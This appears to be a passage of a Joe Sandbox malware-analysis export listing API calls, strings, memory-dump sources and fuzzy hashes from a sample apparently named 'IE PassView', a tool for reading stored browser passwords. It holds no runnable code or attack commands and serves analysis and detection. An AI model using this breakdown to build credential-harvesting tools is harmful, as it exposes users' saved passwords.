                                        • LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                        • memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00008000,0040752E,004027DA,IE PassView), ref: 004074C6
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,0040752E,004027DA,IE PassView), ref: 004074E4
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407502
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407512
                                        Strings
                                        • strings, xrefs: 00407593
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00407534
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itoa_mbscpymemcpystrlen
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                        • API String ID: 2720128018-4125592482
                                        • Opcode ID: 2aa69879c5b011a083883b1db7165153c19e66f696278c2f2b28a7a3b07e28df
                                        • Instruction ID: fb2b10d7110c983e17de72fb39963645640201e5a887eeac91649e02a4ff43f4
                                        • Opcode Fuzzy Hash: 2aa69879c5b011a083883b1db7165153c19e66f696278c2f2b28a7a3b07e28df
                                        • Instruction Fuzzy Hash: 0B31B170914502ABD718CF68EF40EB13375F744348B10853EE852E72A2DBB9B821CB1D
                                        APIs
                                        • wcsstr.MSVCRT ref: 00402196
                                        • wcsstr.MSVCRT ref: 004021AC
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004021EA
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402200
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402216
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040222B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$wcsstr
                                        • String ID: Microsoft_WinInet_$microsoft_wininet_
                                        • API String ID: 1878082614-2466264047
                                        • Opcode ID: 41231355ded2f497d01e705dfffcba8f40f154eeb1d2e485cd79e378f1fdc991
                                        • Instruction ID: 221f4b76ed72acdf7a56df693a9159ee713d33e5712e317dd6bba9da51bfd115
                                        • Opcode Fuzzy Hash: 41231355ded2f497d01e705dfffcba8f40f154eeb1d2e485cd79e378f1fdc991
                                        • Instruction Fuzzy Hash: 5C3146B6904118BFDB10DF99DCC5E9A77FCEB08364F1046AAB518F32D1D634AE408B64
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,;k@,00406AA3,?,?,;k@,?), ref: 00406934
                                          • Part of subcall function 00405CBC: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00406955,00000000,00000000,?,00000020,?,;k@,00406AA3,?,?,;k@), ref: 00405CC9
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406964
                                          • Part of subcall function 00406883: _memicmp.MSVCRT ref: 0040689D
                                          • Part of subcall function 00406883: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,;k@,?), ref: 004068B4
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?), ref: 004069A7
                                        • strchr.MSVCRT ref: 004069CC
                                        • strchr.MSVCRT ref: 004069DD
                                        • _strlwr.MSVCRT ref: 004069EB
                                        • CloseHandle.KERNEL32(00000000), ref: 00406A1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwr
                                        • String ID: ;k@
                                        • API String ID: 4244813814-665460895
                                        • Opcode ID: 3410370ad32c9d4de045059b5ad17b520df0b79d9fba2ef42f2fb680907535ef
                                        • Instruction ID: 0c70c8e6fbfe2c3a98432151b0775178d8653de44996378fb7d39e0ef779b4ec
                                        • Opcode Fuzzy Hash: 3410370ad32c9d4de045059b5ad17b520df0b79d9fba2ef42f2fb680907535ef
                                        • Instruction Fuzzy Hash: 0C31C7B1900118BFEB11EB95DC85AEE77BCEB05354F10807AF509F61C1D6389E548B69
                                        APIs
                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00403F1F
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403F31
                                        • FreeLibrary.KERNEL32(00000000), ref: 00403F45
                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403F70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        • Opcode ID: 20fedd965ce86ee55ee3df6d6bbd08f0b6f3b31df7e532facff727d16d68ce21
                                        • Instruction ID: e6b3c2a68b509e593394b2d7662e1df3b50a3b5230e54d80e03e1d0a70b7e3ce
                                        • Opcode Fuzzy Hash: 20fedd965ce86ee55ee3df6d6bbd08f0b6f3b31df7e532facff727d16d68ce21
                                        • Instruction Fuzzy Hash: 8E01D6B1B542126BE7116FB69C49B6B7EACDB40746B004835F206F11C0DAB8DA05836D
                                        APIs
                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00405416
                                        • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00405434
                                        • strlen.MSVCRT ref: 00405441
                                        • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00405451
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040545B
                                        • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 0040546B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2881943006-572158859
                                        • Opcode ID: f721cc2d38dd59c01ce3eeb84e35142f2e787372eaa94605a12a8c02df4ffc6b
                                        • Instruction ID: 780582968d839c517e208e6dc7c127c2c37749bd79845ccb932b079bb69e2106
                                        • Opcode Fuzzy Hash: f721cc2d38dd59c01ce3eeb84e35142f2e787372eaa94605a12a8c02df4ffc6b
                                        • Instruction Fuzzy Hash: 52012B31504124BBE7242B62EC4AFDF7B2CDF04796F20843AF501B11D0DA796E50DAAC
                                        APIs
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004083FD
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00408419
                                        • memcpy.MSVCRT(?,00411890,00000014), ref: 00408441
                                        • memcpy.MSVCRT(?,0041187C,00000010,?,00411890,00000014), ref: 0040845E
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004084E7
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 004084F1
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408529
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadString_mbscpystrlen
                                        • String ID: $$d
                                        • API String ID: 388234355-2066904009
                                        • Opcode ID: 2fce070b17f5a660c87dd23a172e0407e34b37c71a1e881ab68f4cc6ffd329e7
                                        • Instruction ID: dc56f8c129f481b0dd62ad421b394fb76c497c747426203c51168f4f8d00e949
                                        • Opcode Fuzzy Hash: 2fce070b17f5a660c87dd23a172e0407e34b37c71a1e881ab68f4cc6ffd329e7
                                        • Instruction Fuzzy Hash: 13518AB1A01704AFD724DF29C981B9ABBF4BF48314F10852EE59ADB391EB74E940CB44
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,004091CC,?,?), ref: 0040D0F2
                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,004091CC,?,?), ref: 0040D118
                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,004091CC,?,?), ref: 0040D130
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: b53453093a91a2bd40d54fb5dcbadfb278f82bfd0d1c808de773c38b7fa42392
                                        • Instruction ID: 8d1a721b06f3ef9d69305db24848b834247efd1fec95164425edd42bfaaf8daa
                                        • Opcode Fuzzy Hash: b53453093a91a2bd40d54fb5dcbadfb278f82bfd0d1c808de773c38b7fa42392
                                        • Instruction Fuzzy Hash: DF01A2F2E8429475DB3110C61C06FB71A555BB7B24E75003BF9C9386C6A8BE088F91AF
                                        APIs
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000,00000001,00000000,?,00402B39), ref: 00402A2C
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,00402B39), ref: 00402A46
                                          • Part of subcall function 00405C7E: ReadFile.KERNEL32(00000000,00000000,00402A58,00000000,00000000,00000001,9+@,00402A58,00000000,00000000), ref: 00405C95
                                        • memcmp.MSVCRT(00000000,?,00000005,?,?,?,?,00402B39), ref: 00402A7A
                                        • memcmp.MSVCRT(0000000C,00000001,00000005,?,?,?,?,?,?,?,00402B39), ref: 00402A97
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00402B39), ref: 00402ABD
                                        • CloseHandle.KERNEL32(00000000,?,00402B39), ref: 00402AC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: File$memcmp$??2@??3@CloseCreateHandleReadSize
                                        • String ID: 9+@
                                        • API String ID: 7797768-3562519540
                                        • Opcode ID: 2b7e516e48c429a51e6f156abf3eed591b1d8f4c21f64f567d49faeb7356c2f7
                                        • Instruction ID: d632cf90474aa45c018bec6463a2574c5a954da09c684a606b26d43efe75a2a7
                                        • Opcode Fuzzy Hash: 2b7e516e48c429a51e6f156abf3eed591b1d8f4c21f64f567d49faeb7356c2f7
                                        • Instruction Fuzzy Hash: DD21D871900208BADB109B75DC49B9F7BAC9F10318F14817AFC05F62C2E7749A48CAA5
                                        APIs
                                        • memset.MSVCRT ref: 00407C3F
                                        • GetDlgCtrlID.USER32(?), ref: 00407C4A
                                        • GetWindowTextA.USER32(?,?,00001000), ref: 00407C5D
                                        • memset.MSVCRT ref: 00407C83
                                        • GetClassNameA.USER32(?,?,000000FF), ref: 00407C96
                                        • _strcmpi.MSVCRT ref: 00407CA8
                                          • Part of subcall function 00407AF1: _itoa.MSVCRT ref: 00407B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                        • String ID: sysdatetimepick32
                                        • API String ID: 3411445237-4169760276
                                        • Opcode ID: 70858a5686a83ca73d16e525b2de2590a93d48c2ec5b21909403165946aeb95a
                                        • Instruction ID: 17534c4f124164a7f414e19630819eabf2b16663dbddf6454363a62207f4d036
                                        • Opcode Fuzzy Hash: 70858a5686a83ca73d16e525b2de2590a93d48c2ec5b21909403165946aeb95a
                                        • Instruction Fuzzy Hash: E811CAB2C0811D6EEB15A755DC81DEA7BACEF14355F0400BBFA08F3151E674AE848B65
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 004050F8
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040510B
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405120
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405138
                                        • EndDialog.USER32(?,00000002), ref: 00405154
                                        • EndDialog.USER32(?,00000001), ref: 00405167
                                          • Part of subcall function 00404E01: GetDlgItem.USER32(?,000003E9), ref: 00404E0F
                                          • Part of subcall function 00404E01: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E24
                                          • Part of subcall function 00404E01: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00404E40
                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040517F
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040528B
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Item$DialogMessageSend
                                        • String ID:
                                        • API String ID: 2485852401-0
                                        • Opcode ID: 9e37208e1ac624ff015cc8e23fc7f15464607b37513521ea11ea388b8c8f7f62
                                        • Instruction ID: 772c1af3226cbc80ad889adf0027262ed51c140b767d915fdd2215fad93927ef
                                        • Opcode Fuzzy Hash: 9e37208e1ac624ff015cc8e23fc7f15464607b37513521ea11ea388b8c8f7f62
                                        • Instruction Fuzzy Hash: 8461C730500A05AFDB21AF25C886B2BB7A5FF50724F00C23EF915AA6D1D778A950CF95
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004052AC
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004052C8
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004052EF
                                        • memset.MSVCRT ref: 00405300
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 0040532F
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 0040537C
                                        • SetFocus.USER32(?,?,?,?), ref: 00405385
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00405393
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: ffda32b987b975e76c272f98d077908fce1f9b3e3661f9b97b05ec55d3a69eb9
                                        • Instruction ID: fcb6e9a3e2539a50ad56ef20c263cb5018baa505a50de7ca275cb4eb460b5b6e
                                        • Opcode Fuzzy Hash: ffda32b987b975e76c272f98d077908fce1f9b3e3661f9b97b05ec55d3a69eb9
                                        • Instruction Fuzzy Hash: DF3192B2900605AFDB289F69C88592BB7A8FF04354B10853FF559E72E1DB74AC508F98
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040A37D
                                        • GetWindowRect.USER32(?,?), ref: 0040A393
                                        • GetWindowRect.USER32(?,?), ref: 0040A3A6
                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040A3C3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A3E0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A400
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A427
                                        • EndDeferWindowPos.USER32(?), ref: 0040A430
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00404EF1
                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00404F0A
                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00404F17
                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00404F23
                                        • memset.MSVCRT ref: 00404F8D
                                        • SendMessageA.USER32(?,00001019,?,?), ref: 00404FBE
                                        • SetFocus.USER32(?), ref: 00405043
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • _mbscat.MSVCRT ref: 00408F0E
                                        • sprintf.MSVCRT ref: 00408F30
                                        Strings
                                        Similarity
                                        • API ID: FileWrite_mbscatsprintfstrlen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 1631269929-4153097237
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                        • String ID: 0$6
                                        • API String ID: 2300387033-3849865405
                                        APIs
                                        • memset.MSVCRT ref: 00405E44
                                        • sprintf.MSVCRT ref: 00405E6D
                                        • strlen.MSVCRT ref: 00405E79
                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405E8E
                                        • strlen.MSVCRT ref: 00405E9C
                                        • memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405EAC
                                        Strings
                                        Similarity
                                        • API ID: memcpystrlen$memsetsprintf
                                        • String ID: %s (%s)
                                        • API String ID: 3756086014-1363028141
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf
                                        • String ID: %2.2X
                                        • API String ID: 125969286-791839006
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B63F
                                        • RegisterClassA.USER32(?), ref: 0040B664
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B66B
                                        • CreateWindowExA.USER32(00000000,IEPV,IE PassView,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 0040B68D
                                        Strings
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: IE PassView$IEPV
                                        • API String ID: 2678498856-1990178490
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040BDFE,00000000,00000000), ref: 0040C2A1
                                        • memset.MSVCRT ref: 0040C2FE
                                        • memset.MSVCRT ref: 0040C310
                                          • Part of subcall function 0040C189: _mbscpy.MSVCRT(?,-00000001), ref: 0040C1AF
                                        • memset.MSVCRT ref: 0040C3F7
                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040C41C
